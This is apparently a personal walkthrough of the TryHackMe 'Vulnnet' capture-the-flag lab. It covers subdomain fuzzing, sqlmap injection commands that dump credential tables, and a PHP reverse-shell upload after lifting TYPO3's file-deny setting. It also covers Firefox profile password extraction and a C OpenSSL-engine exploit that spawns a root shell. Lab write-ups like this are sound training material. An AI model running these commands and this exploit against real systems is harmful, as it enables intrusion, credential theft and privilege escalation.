Tryhackme:Vulnnet Walkthrough
This is a small hacking adventure into Vulnnet. I may have gotten more than I bargained for when I choose to hack this box because there were parts of this box I got stuck on and had to take a small hint to carry on. I’ll explain during the walk through on where I got stuck and lessons learned.
I started out out with enumerating via nmap.
nmap -Pn -sC -sV -p- 10.10.204.230 -v
Visiting the webpage reveals that services are only accessible through the vulnnet.thm domain.
Add the ip address to your host file since since the TryHackMe page tells us the target domain is vulnnet.thm
When we add the domain to our host file we get a simple website page.
Since we are unable to get more information from the TLD website we are going to look at enumerating website services. First, I initiate a nikto scan but it doesn’t reveal any more information that what we already don’t know.
Next, I will start fuzzing for subdirectories and files with a simple gobuster scan. Gobuster is not installed in kali linux by default. You can install it by running the following command:
sudo apt install gobuster
The following command will initiate a gobuster scan with a wordlist file. The wordlist file used is installed on kali linux by default.
gobuster dir -u http://vulnnet.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 50
Since a gobuster scan doesn’t really enumerate much more information for us we will next need to do some subdomain hunting. For subdomains I use a built in tool with kali called fuff. For my subdomain wordlist I use a wordlists from seclists. Seclists is not installed by default in kali linux. You can install it manually by doing the following command:
sudo apt install seclists
Once you have the seclists wordlists installed you can initiate a subdomain scan:
ffuf -u http://vulnnet.thm -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H ‘Host: FUZZ.vulnnet.thm’ -fs 0 -fs 65
I did filter certain response status out since I was receiving alot of false positives during my subdomain scan.
After the scan is completed we get back four different subdomains:
api
shop
blog
admin1
We can then add the full subdomains to our /etc/hosts file:
If you noticed my ip changed with my host file… good job! I had to re-deploy the machine a few times during this writeup.
When we go to the following url http://admin1.vulnnet.thm we just get a message that the panel is up.
At this point we will need to enumerate this subdomain more. So with gobuster. I initiate the following command to scan the subdomain.
gobuster dir -u http://admin1.vulnnet.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 50
Eventually what we see if a folder called typo3 which is a logon portal for the typo CMS.
While doing research with Typo3 CMS, the default user name on installation is admin and the password is made on installation. So I tried several weak passwords to no avail.
Since there was entry point into the CMS portal, I started looking at the blog portal next.
Nothing stood out on this article after I clicked on it so I started looking at the source code to the story. There are a few things I look at when I sift source code.
- Local .js files that are stored locally and looking for clear text creds from a coding misconfiguration
- Are there URL’s that point to interesting places? api’s? undiscovered url endpoints?
- Clear text creds stored in source code
This is where I saw a call back to an api and ultimately where I got stuck on where do I go to next.
API hacking is something that I have not had very much exposure to even with the CTF world. At this point I knew I would need some help on where to go to next.
After I looked at a hint to this problem I knew immediately I probably would not have stumbled upon this easily with research. I actually never even knew it was possible to do this with an API.
Enter SQL Injection
So one thing to keep in mind here is we are staring at this API (figure14) from an unauthenticated perspective. One of the the best blogs and cheatsheets on SQL login bypasses is from pentestlab.blog. This post was written back in 2012 and is still very relevant today.
So lets take a look and see what happens when I add the statement “or 1=1” at the end of the blog api url.
We see that the request ID has changed and was allowed. This indicates that this website is vulnerable to SQL injection. We are going to use an automated tool called sqlmap to do SQL injection for us so that we can pull tables, usernames, and passwords that are stored from within the database. Before I through start through commands there are a few switches I want to break down so this explains what I am doing with sqlmap.
-u this is the target url we need to give sqlmap to connect to.
-batch this tells sql map to never ask for user input and just use the default behavior.
-dbs this switch allows to enumerate the DBMS databases
sqlmap -u http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1 — batch — dbsWhen the command is ran we will get the following information back that the database server is running 3 databases.
Now we want to access the database vn_admin and see what tables exist from within the database. We can do so with the following command:
sqlmap -u http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1 — batch -D vn_admin -tablesApproximately 48 tables will be returned. The main table we are interested in is the be_user table.
Now we need to look at the columns from within the be_users table. We can do so with the following command:
sqlmap -u http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1 — batch -D vn_admin -T be_users — columns
Approximately 34 columns will be returned. The column we are interested in is the password column.
Now lets output both the usernames and passwords from the be_users table. Username is also a column in figure 19.
sqlmap -u http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1 — batch -D vn_admin -T be_users -C username,password — dump
With this command we are able to get both the user name and password have for the user chris_w
All is well and we should be able to crack this password…right???
According to my status in john it will take about a month to crack this password using a pure vm and cpu power. Since this is taking too long we need to enumerate the database some more.
Back in figure16 we had three separate databases in the MySQL database. No we need to pull the tables and columns from the blog database.
sqlmap -u http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1 — batch -D blog -tablesThere are 4 tables from within the blog database.
Next, lets go ahead and list the columns out for the users table.
sqlmap -u http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1 — batch -D blog -T users — columnsYou will see there is a
Now we will need to dump both the username and password columns to a csv file. We can do so with the following command:
sqlmap -u http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1 — batch -D blog -T users -C username,password — dumpOnce this is done it will put the following csv file into a path similar to the one below:
/home/kali/.local/share/sqlmap/output/api.vulnnet.thm/dump/blog/users.csv
Now what I am going to do is get the data from the csv file into a readable text format so we can crack the hash for chris_w.
cat /home/kali/.local/share/sqlmap/output/api.vulnnet.thm/dump/blog/users.csv | cut -d “,” -f2 > passwords.txtThe above code block should be all in one line. I am showing an example of it along with using john and a wordlist to crack the MySQL hash.
At this point we should be able to login in as chris_w and gain access to the Typo3 cms admin portal located at the following url:
http://admin1.vulnnet.thm/typo3/
Since we now have a confirmed version for Typo3 we can search searchsploit and look for any type of authenticated remote code execution vulnerability but none was available at the time of writing this.
Since Typo3 supports php we will try to upload a php reverse shell in order to get an interactive tty session going on the server. To save some time here you will need to modify a file deny setting in Admin Tools > Settings > Configure Installation-Wide Options.
If you search filter for filedeny in the systemwide options you will see a file deny pattern default. What I did is I removed everything from it and wrote out the configuration.
Once we are done unrestricting php file uploads we can navigate to FILE > Filelist and upload a php webshell.
I used a php reverse shell located on my kali installation at /usr/share/webshells/php
Before uploading your php reverse shell you are going to want to change the ip and port to the ip address you are on and the port you are listening to with your netcat listener.
Once you upload the shell you should be able to see it by navigating to the following URL:
http://admin1.vulnnet.thm/fileadmin/
Once you execute the shell.php file you should receive a callback with your netcat listener on the port you specified with your reverse shell prior to uploading.
One thing I found interesting when enumerating was seeing a mozilla profile present on the server. I’ve retrieved passwords before with mozilla profiles on other CTF boxes I encountered so I thought this may be worth a look.
You can export the mozilla profile first by zipping the file up and storing it on the /tmp directory and then hosting it out via python as shown below:
zip /tmp/mozilla.zip .mozilla -r
You can download directly by going to the website you hosted with python and downloading the zip file.
There is a tool to recover passwords from a firefox profile that I have used before. The github repo is located here:
After running the tool on both profiles in the profiles.ini the decrypt tool was not successful at any password extraction.
You will notice from Figure 37 that there is a third profile that we have initially extracted but is not getting evaluated when we run the firefox decypt tool.
I changed the profile.ini file to the following:
Once the profile change is made in the profile.ini file you should see a new profile pop in. Once you selec the new profile you will get a new set of credentials to work with.
Since there is no userid on the system when we look at our /etc/passwd file with our initial shell access as well as the /home directory we only see one user besides the root account called system.
One thing I like to do is re-use passwords for other systems to see if they work. Since there is no account named chris_w@vulnnet.thm I will try and log in as system with the password that had been decrypted from Figure 39.
Next, I uploaded Linpeas and started doing privilege escalation enumeration. I was stuck on enumeration for quite a while trying to figure out where the privesc path would be. These two CVE’s will immediately jump out at you once you run. These two exploits require certain conditions to be met. Since this box is running Ubuntu 18.04 I found the exploit process I had for each of these doesn’t work.
Since there was nothing too obvious I started digging into my outputs a little deeper and I noticed that a few files have capabilities on them which is interesting.
I personally have not worked on a machine before with this type of privilege escalation path. My first step was google searching /openssl =ep
One of the first articles I landed on with a decent walkthrough and understanding of how to exploit.
Step 1 Pre-req:
If you are conducting this on Kali Linux you will need to install the libssl-dev package first.
sudo apt install libssl-dev
Step 1. create a .c file with the following code:
#include <openssl/engine.h>static int bind(ENGINE *e, const char *id)
{
setuid(0); setgid(0);
system("/bin/bash");
}IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
Step 2. Compile Exploit
To compile it requires two steps.
gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
gcc -shared -o openssl-exploit-engine.so -lcrypto openssl-exploit-engine.o
Once this is done you will need to upload the openssl-exploit-engine.so file to the server. I would suggest uploading it to the /tmp directory.
Step 3. Run Exploit
/home/system/Utils/openssl req -engine ./openssl-exploit-engine.so
